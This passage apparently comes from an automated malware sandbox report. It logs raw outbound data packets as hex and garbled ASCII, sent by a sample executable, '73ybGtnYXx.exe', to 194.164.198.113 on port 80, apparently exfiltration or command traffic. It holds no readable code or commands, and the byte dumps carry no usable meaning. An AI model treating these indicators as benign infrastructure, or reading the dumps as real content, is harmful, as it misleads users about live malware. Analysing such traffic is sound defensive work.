                                                                Mar 17, 2025 12:28:00.854732037 CET4944OUTData Raw: 02 17 16 73 cd 7e 23 55 2b 39 8a 2c 40 96 4c d7 64 4f fd 19 6f 06 42 c4 f4 c3 aa 1c 45 a0 70 d6 a2 2c 52 45 39 3f fd 43 f7 35 6e f4 41 bc fe 4f 34 be ca b9 d3 30 58 4b 48 81 3e be 42 e5 0f c3 19 ff 20 ae b5 9a 4e ec 9e 35 69 7d 0e 56 d7 ce 0b 57
                                                                Data Ascii: s~#U+9,@LdOoBEp,RE9?C5nAO40XKH>B N5i}VWW\\k`FIs)6'Q% @|qfjCPi/\7'1K?CzBI.Y,<2"tuA9;APjiPoMOF(HbX^4m
                                                                Mar 17, 2025 12:28:00.854753971 CET9888OUTData Raw: 6a a4 73 71 d7 10 31 cb fb ad 3a b0 3d b6 5d 0f fa c9 25 51 a6 dd e3 b6 ad 12 59 81 72 df 00 bc 41 73 50 75 e0 a1 c0 dd 9e f0 52 f4 c5 d7 34 68 05 19 cb 9e 35 b2 37 e8 f0 21 33 b6 92 e2 27 72 eb e6 13 c8 ca 09 0a 91 3a 9d 73 23 4f 90 f2 a1 57 99
                                                                Data Ascii: jsq1:=]%QYrAsPuR4h57!3'r:s#OWuhoMZ+Rmy7Lh5@ZS|n6*<!K!>^7X@2DVgQMe*^/S+gPZZ|XnEVK=+Y!#_Ca"?iV:bJ
                                                                Mar 17, 2025 12:28:00.859493017 CET4944OUTData Raw: 09 a7 82 15 6a b0 d0 9f 9b fa e3 f3 f4 be f2 7f 00 24 fa 41 91 63 23 16 df 62 85 26 48 81 93 6e 58 5f 8d 28 7c 65 d5 8f 36 e0 16 43 fe 7c 63 e0 69 56 b0 bd a6 34 83 1c f3 16 a0 75 eb 67 8f 41 2d a9 a7 65 a4 91 56 32 a5 7b 8a 17 2f c6 16 c4 65 f2
                                                                Data Ascii: j$Ac#b&HnX_(|e6C|ciV4ugA-eV2{/ey0Q3M-~GkB^D7>}Cz9$m)(HF{k>8|VbAg5lndRV?H~#)H.+4&aowI~]&pau]C:>:BlmX
                                                                Mar 17, 2025 12:28:00.859534979 CET9888OUTData Raw: 50 44 0b 07 e8 37 9e e2 ac 60 06 72 34 4e 95 29 15 40 31 5d 10 a0 62 44 ad 4a fd 30 1f 37 4c ec ed d9 cd 50 02 35 28 44 d6 62 da d9 61 57 56 72 75 4c 23 71 61 ca fb 40 be 21 0e 80 fe 61 47 5a d4 39 bb f7 5b bb 77 58 a7 30 f9 cd b1 f7 09 2e e4 4c
                                                                Data Ascii: PD7`r4N)@1]bDJ07LP5(DbaWVruL#qa@!aGZ9[wX0.L]/)0KIqNlv/+_#j}]jZ;|WjK4VUo6-d67!,I6mY]@5eh-u?1<;B
                                                                Mar 17, 2025 12:28:00.860261917 CET27192OUTData Raw: 9b 45 42 a9 bc dc a5 f0 2c 65 e4 d8 d6 1b 58 e7 76 d5 8a 93 20 69 49 92 c4 55 d1 8b 33 26 c5 06 95 b8 67 1b 31 9b 89 40 fa 38 a0 93 70 12 f5 0b 0f 7c e7 36 37 43 1a 41 6a 64 6b 29 42 a4 7c 0f 92 b8 33 52 f6 db 8a 05 db 7e bc 30 20 60 7b e9 82 7a
                                                                Data Ascii: EB,eXv iIU3&g1@8p|67CAjdk)B|3R~0 `{zu6,yV)W>x,V@i4KZz{8B8TDB&45{e}e9\i"Mz89`NFh?HzS|zoE]Q6tJ~YJ*
                                                                Mar 17, 2025 12:28:00.911808014 CET23484OUTData Raw: 2d f7 23 fa 7a 5e b3 87 70 61 77 6f 36 19 c4 ab 7b e8 4e f3 74 af 68 b5 85 71 98 31 4d 3b ad 7b 38 2b f3 ae 9d b0 74 68 59 50 18 24 f2 01 db 83 f8 49 16 03 df 44 06 76 76 4d 4c 04 bb b3 3a bc de a0 5f af 07 60 ce a8 92 7e e7 09 e2 4d c8 2f 7b c6
                                                                Data Ascii: -#z^pawo6{Nthq1M;{8+thYP$IDvvML:_`~M/{h0,vII&^UM+:JCL3TCWs4{=&a{WBlnC8V1n_Fu"l;-Is:$!qJ]OY3"jEfxQ26S9,
                                                                Mar 17, 2025 12:28:00.963479996 CET3708OUTData Raw: 66 d6 cc f9 f6 20 ed 04 4d a8 7b 38 d7 ae 56 8e d5 6b ba 37 22 52 1a 2a f3 b8 b6 47 9b 2d d2 1b 5e e0 3b 4a 30 74 51 d3 9e f6 7d 0b 73 e4 5a e0 ff c9 be 13 cd 2a 96 67 e2 14 6d 9c eb 04 fd 92 af 6f 1b c0 91 00 df 17 7c a9 a9 f0 ef 73 7a 93 9c 36
                                                                Data Ascii: f M{8Vk7"R*G-^;J0tQ}sZ*gmo|sz6;hDV)*>BJXTN-__<+\e+Lh\@~2@Gm6/Hg^3q/\C)GC?%=U`o3LdEm%v,Y;>N


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.860235194.164.198.11380804296C:\Users\user\Desktop\73ybGtnYXx.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 17, 2025 12:28:21.887998104 CET148OUT